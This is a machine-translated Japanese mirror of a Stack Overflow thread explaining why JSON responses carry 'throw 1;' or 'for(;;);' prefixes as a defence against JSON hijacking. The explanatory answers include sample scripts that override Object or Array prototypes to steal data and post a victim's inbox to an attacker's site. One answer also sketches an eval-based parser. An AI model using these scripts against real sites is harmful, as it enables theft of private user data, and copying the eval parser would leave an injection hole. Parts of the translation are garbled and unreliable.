なぜ人々は「1を投げる; <邪悪になるな>」と「for(;;);」jsonの応答の前に?[複製]

221
Christopher Tarquini 2010-06-30 19:58.

重複の可能性:
Googleがwhile(1)を付加するのはなぜですか。彼らのJSON応答に?

Googleは次のようにjsonを返します:

throw 1; <dont be evil> { foo: bar}

Facebookのajaxには次のようなjsonがあります。

for(;;); {"error":0,"errorSummary": ""}
  • なぜ彼らは実行を停止して無効なjsonを作るコードを置くのですか?
  • それが無効である場合、彼らはそれをどのように解析し、あなたがそれを評価しようとするとクラッシュするでしょうか?
  • 彼らはそれを文字列から削除するだけですか(高価なようです)?
  • これにはセキュリティ上の利点はありますか?

それがセキュリティ目的であることに応じて:

スクレーパーが別のドメインにscriptある場合、XHRはクロスドメインで機能しないため、データを取得するためにタグを使用する必要があります。for(;;);攻撃者はどのようにしてデータを取得するのでしょうか。変数に割り当てられていないので、参照がないためにガベージコレクションされるだけではないでしょうか。

基本的に、データをクロスドメインで取得するには、彼らがしなければならないでしょう

<script src="http://target.com/json.js"></script>

ただし、クラッシュスクリプトが付加されていなくても、攻撃者は、グローバルにアクセスできる変数に割り当てられていない限り、Jsonデータを使用できません(これらの場合はそうではありません)。クラッシュコードがなくても、サイトのデータを使用するにはサーバーサイドスクリプトを使用する必要があるため、クラッシュコードは事実上何もしません。

4 answers

193
bobince 2010-06-30 23:02.

for(;;);攻撃者はどのようにしてデータを取得するのでしょうか。

攻撃は、コンストラクター関数またはその。を変更することにより、組み込み型、特にObjectおよびの動作を変更することに基づいてArrayprototypeます。次に、ターゲットのJSONが{...}または[...]コンストラクトを使用する場合、それらは攻撃者自身のバージョンのオブジェクトになり、予期しない動作が発生する可能性があります。

たとえば、setter-propertyをにハックしてObject、オブジェクトリテラルに記述された値を裏切ることができます。

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

次に、<script>そのプロパティ名を使用するJSONがaにポイントされた場合:

{"x": "hello"}

"hello"がリークされます。

配列リテラルとオブジェクトリテラルがセッターを呼び出す方法については議論の余地があります。Firefoxは、有名なWebサイトへの攻撃が公表されたことに対応して、バージョン3.5でこの動作を削除しました。ただし、執筆時点では、Safari(4)とChrome(5)は依然としてこれに対して脆弱です。

現在すべてのブラウザーで許可されていないもう1つの攻撃は、コンストラクター関数を再定義することでした。

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]

そして今のところ、IE8のプロパティの実装(ECMAScript Fifth Edition標準およびに基づくObject.defineProperty)は現在、Object.prototypeまたはで機能しませんArray.prototype

しかし、過去のブラウザを保護するだけでなく、JavaScriptの拡張機能が将来、同様の種類のリークを引き起こす可能性があります。その場合、籾殻はそれらからも保護する必要があります。

60
Jesse Dhillon 2010-07-17 19:31.

Gmailアカウントを確認した後、私の邪悪なページにアクセスすることを検討してください。

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.serialize(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

これから起こることは、グーグルから来たJavascriptコード(質問者は無害ですぐに範囲外になると思っていた)が実際に私の邪悪なサイトに投稿されるということです。スクリプトタグで要求されたURLが送信するとします(ブラウザが適切なCookieを提示するため、Googleはユーザーが受信トレイにログインしていると正しく認識します)。

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

今、私はこのオブジェクトのシリアル化されたバージョンを私の邪悪なサーバーに投稿します。ありがとうございました!

これを防ぐ方法は、JSON応答を削除し、同じドメインからそのデータを操作できるときにそれらを削除することです。この回答が気に入った場合は、bobinceによって投稿された回答を受け入れてください。

23
rook 2010-06-30 22:06.

編集

これらの文字列は一般に「解析不可能なクロフト」と呼ばれ、JSON仕様に影響を与える情報漏えいの脆弱性にパッチを適用するために使用されます。この攻撃は現実の世界であり、Gmailの脆弱性がJeremiahGrossmanによって発見されました。Mozillaはまた、これがJSON仕様の脆弱性であると考えており、Firefox3でパッチが適用されています。ただし、この問題は他のブラウザにも影響を与えるため、互換性のあるパッチであるため、この「解析不可能な問題」が必要です。

ボビスの答えには、この攻撃の技術的な説明があり、それは正しいです。

5
dan04 2010-06-30 20:12.

それが無効である場合、彼らはそれをどのように解析し、あなたがそれを評価しようとするとクラッシュするでしょうか?

試してみるとクラッシュする機能ですevalevalクロスサイトスクリプティング攻撃に使用される可能性のある任意のJavaScriptコードを許可します。

彼らはそれを文字列から削除するだけですか(高価なようです)?

そう思います。おそらく次のようなものです:

function parseJson(json) {
   json = json.replace("throw 1; <dont be evil>", "");
   if (/* regex to validate the JSON */) {
       return eval(json);
   } else {
       throw "XSS";
   }
}

「邪悪になるな」の雑用は、開発者evalがより安全な代替手段の代わりに直接使用することを防ぎます。

Related questions

MORE COOL STUFF

Reba McEntire は、彼女が息子の Shelby Blackstock と共有する「楽しい」クリスマスの伝統を明らかにしました:「私たちはたくさん笑います」

Reba McEntire は、彼女が息子の Shelby Blackstock と共有する「楽しい」クリスマスの伝統を明らかにしました:「私たちはたくさん笑います」

Reba McEntire が息子の Shelby Blackstock と共有しているクリスマスの伝統について学びましょう。

メーガン・マークルは、自然な髪のスタイリングをめぐってマライア・キャリーと結ばれました

メーガン・マークルは、自然な髪のスタイリングをめぐってマライア・キャリーと結ばれました

メーガン・マークルとマライア・キャリーが自然な髪の上でどのように結合したかについて、メーガンの「アーキタイプ」ポッドキャストのエピソードで学びましょう.

ハリー王子は家族との関係を修復できるという「希望を持っている」:「彼は父親と兄弟を愛している」

ハリー王子は家族との関係を修復できるという「希望を持っている」:「彼は父親と兄弟を愛している」

ハリー王子が家族、特にチャールズ王とウィリアム王子との関係について望んでいると主張したある情報源を発見してください。

ワイノナ・ジャッドは、パニックに陥った休暇の瞬間に、彼女がジャッド家の家長であることを認識しました

ワイノナ・ジャッドは、パニックに陥った休暇の瞬間に、彼女がジャッド家の家長であることを認識しました

ワイノナ・ジャッドが、母親のナオミ・ジャッドが亡くなってから初めての感謝祭のお祝いを主催しているときに、彼女が今では家長であることをどのように認識したかを学びましょう.

セントヘレナのジェイコブのはしごを登るのは、気弱な人向けではありません

セントヘレナのジェイコブのはしごを登るのは、気弱な人向けではありません

セント ヘレナ島のジェイコブズ ラダーは 699 段の真っ直ぐ上る階段で、頂上に到達すると証明書が発行されるほどの難易度です。

The Secrets of Airline Travel Quiz

The Secrets of Airline Travel Quiz

Air travel is far more than getting from point A to point B safely. How much do you know about the million little details that go into flying on airplanes?

Where in the World Are You? Take our GeoGuesser Quiz

Where in the World Are You? Take our GeoGuesser Quiz

The world is a huge place, yet some GeoGuessr players know locations in mere seconds. Are you one of GeoGuessr's gifted elite? Take our quiz to find out!

バイオニック読書はあなたをより速く読むことができますか?

バイオニック読書はあなたをより速く読むことができますか?

BionicReadingアプリの人気が爆発的に高まっています。しかし、それは本当にあなたを速読術にすることができますか?

オーケーグッド770HPランボルギーニセンテナリオは十分に正気ではない

オーケーグッド770HPランボルギーニセンテナリオは十分に正気ではない

ランボルギーニの創設者であるフェルッチオランボルギーニが100歳になるのは毎日ではありません(そうです、彼は死んでいて、まだ死んでいると思います。

彼らが買った1台の車からAppleの車の計画について私たちが推測できること

彼らが買った1台の車からAppleの車の計画について私たちが推測できること

Appleが自動車分野に参入するという噂はかなり前から渦巻いており、AppleウォッチャーがSixtyEight Researchという会社がAppleの自動車研究開発のシェル会社である可能性が高いと判断したとき、その渦巻きは本当に渦巻いた。また、会社が購入した車は1台だけであることが知られており、その車はAppleが何を考えているかについての手がかりでいっぱいになる可能性があることも伝えています。

天文学者は太陽系の9番目の惑星の新しい証拠を見つけます

天文学者は太陽系の9番目の惑星の新しい証拠を見つけます

太陽系の外側にある架空の大きな物体である惑星Xの探索は、何十年にもわたって人間を魅了してきました。その検索の最新の章は、地球の10倍の大きさで、公転周期が15であるほど遠くにある惑星を指しています。

キャムニュートン、ゴッドダム

キャムニュートン、ゴッドダム

カムニュートンは昨日、簡単な265ヤードと3回のタッチダウンでファルコンズを引き裂き、別の素晴らしいゲームをしました。その日のハイライトは、上のタッチダウンスローでした。これは、視聴するたびにばかげているだけです。

米国のフィギュア スケートは、チーム イベントでの最終決定の欠如に「苛立ち」、公正な裁定を求める

米国のフィギュア スケートは、チーム イベントでの最終決定の欠如に「苛立ち」、公正な裁定を求める

ロシアのフィギュアスケーター、カミラ・バリエバが関与したドーピング事件が整理されているため、チームは2022年北京冬季オリンピックで獲得したメダルを待っています。

Amazonの買い物客は、わずか10ドルのシルクの枕カバーのおかげで、「甘やかされた赤ちゃんのように」眠れると言っています

Amazonの買い物客は、わずか10ドルのシルクの枕カバーのおかげで、「甘やかされた赤ちゃんのように」眠れると言っています

何千人ものAmazonの買い物客がMulberry Silk Pillowcaseを推奨しており、現在販売中. シルクの枕カバーにはいくつかの色があり、髪を柔らかく肌を透明に保ちます。Amazonで最大46%オフになっている間にシルクの枕カバーを購入してください

パデュー大学の教授が覚醒剤を扱った疑いで逮捕され、女性に性的好意を抱かせる

パデュー大学の教授が覚醒剤を扱った疑いで逮捕され、女性に性的好意を抱かせる

ラファイエット警察署は、「不審な男性が女性に近づいた」という複数の苦情を受けて、12 月にパデュー大学の教授の捜査を開始しました。

コンセプト ドリフト: AI にとって世界の変化は速すぎる

コンセプト ドリフト: AI にとって世界の変化は速すぎる

私たちの周りの世界と同じように、言語は常に変化しています。以前の時代では、言語の変化は数年または数十年にわたって発生していましたが、現在では数日または数時間で変化する可能性があります。

SF攻撃で91歳のアジア人女性が殴られ、コンクリートに叩きつけられた

犯罪擁護派のオークランドが暴力犯罪者のロミオ・ロレンゾ・パーハムを釈放

SF攻撃で91歳のアジア人女性が殴られ、コンクリートに叩きつけられた

認知症を患っている 91 歳のアジア人女性が最近、47 番街のアウター サンセット地区でロメオ ロレンゾ パーハムに襲われました。伝えられるところによると、被害者はサンフランシスコの通りを歩いていたところ、容疑者に近づき、攻撃を受け、暴行を受けました。

ℝ

“And a river went out of Eden to water the garden, and from thence it was parted and became into four heads” Genesis 2:10. ? The heart is located in the middle of the thoracic cavity, pointing eastward.

メリック・ガーランドはアメリカに失敗しましたか?

バイデン大統領の任期の半分以上です。メリック・ガーランドは何を待っていますか?

メリック・ガーランドはアメリカに失敗しましたか?

人々にチャンスを与えることは、人生で少し遅すぎると私は信じています。寛大に。

Language